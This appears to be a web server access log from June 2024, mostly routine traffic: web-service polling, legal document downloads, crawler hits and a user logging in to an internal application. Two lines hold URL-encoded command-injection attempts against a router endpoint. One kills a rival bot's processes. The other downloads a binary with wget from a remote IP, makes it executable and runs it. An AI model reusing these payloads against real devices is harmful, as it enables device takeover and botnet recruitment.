201.245.192.253 - - [25/Jun/2024:08:40:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36588
172.22.2.4 - - [25/Jun/2024:08:40:26 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [25/Jun/2024:08:39:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:08:41:08 -0500] "POST /appsia/controlador HTTP/1.1" 200 7779
201.245.192.253 - - [25/Jun/2024:08:41:11 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
201.245.192.253 - - [25/Jun/2024:08:41:12 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
52.15.147.27 - - [25/Jun/2024:08:41:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:08:41:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:08:41:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [25/Jun/2024:08:41:37 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [25/Jun/2024:08:40:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [25/Jun/2024:08:42:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
207.46.13.168 - - [25/Jun/2024:08:42:43 -0500] "GET /Publicaciones/2024EE116292.pdf HTTP/1.1" 200 242590
207.46.13.168 - - [25/Jun/2024:08:42:45 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 14105
201.245.192.253 - - [25/Jun/2024:08:42:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
190.93.152.238 - - [25/Jun/2024:08:43:03 -0500] "GET /BLA/resoluciones/AUTOS%202023/5230.pdf HTTP/1.1" 200 828503
190.93.152.238 - - [25/Jun/2024:08:43:03 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [25/Jun/2024:08:43:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:08:43:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.45 - - [25/Jun/2024:08:43:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0604.pdf HTTP/1.1" 304 -
216.245.221.92 - - [25/Jun/2024:08:44:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:08:44:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:08:43:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Jun/2024:08:43:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
172.22.2.4 - - [25/Jun/2024:08:45:09 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:45:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:08:45:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
141.98.83.197 - - [25/Jun/2024:08:45:51 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [25/Jun/2024:08:45:52 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [25/Jun/2024:08:46:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:08:45:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.85.185.173 - - [25/Jun/2024:08:47:07 -0500] "GET /catalogoisis/imagenes/limpiar2.gif HTTP/1.1" 200 589
201.245.192.253 - - [25/Jun/2024:08:47:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:08:47:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6d086a6c8436b4ccb91788749accebb63.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [25/Jun/2024:08:45:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/faces/index.xhtml HTTP/1.1" 200 680
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50106
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12438
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/css/custom_css_sg.css HTTP/1.1" 200 9692
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/js/disable_browser_buttons.js HTTP/1.1" 200 3230
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/js/funciones.js HTTP/1.1" 200 12592
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:47:46 -0500] "GET /sipsepre/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:47:47 -0500] "GET /sipsepre/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
201.245.192.253 - - [25/Jun/2024:08:47:47 -0500] "GET /sipsepre/css/imagen/logoSDG.png HTTP/1.1" 200 53064
201.245.192.253 - - [25/Jun/2024:08:47:47 -0500] "GET /sipsepre/css/imagen/loginimg.png HTTP/1.1" 200 71635
201.245.192.253 - - [25/Jun/2024:08:47:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [25/Jun/2024:08:47:58 -0500] "POST /sipsepre/faces/autenticacion.xhtml HTTP/1.1" 200 12001
201.245.192.253 - - [25/Jun/2024:08:47:58 -0500] "GET /sipsepre/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
201.245.192.253 - - [25/Jun/2024:08:47:58 -0500] "GET /sipsepre/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:47:58 -0500] "GET /sipsepre/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:47:58 -0500] "GET /sipsepre/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:47:58 -0500] "GET /sipsepre/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:08:47:58 -0500] "GET /sipsepre/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
201.245.192.253 - - [25/Jun/2024:08:48:02 -0500] "POST /sipsepre/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 6409
201.245.192.253 - - [25/Jun/2024:08:48:03 -0500] "POST /sipsepre/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 19460
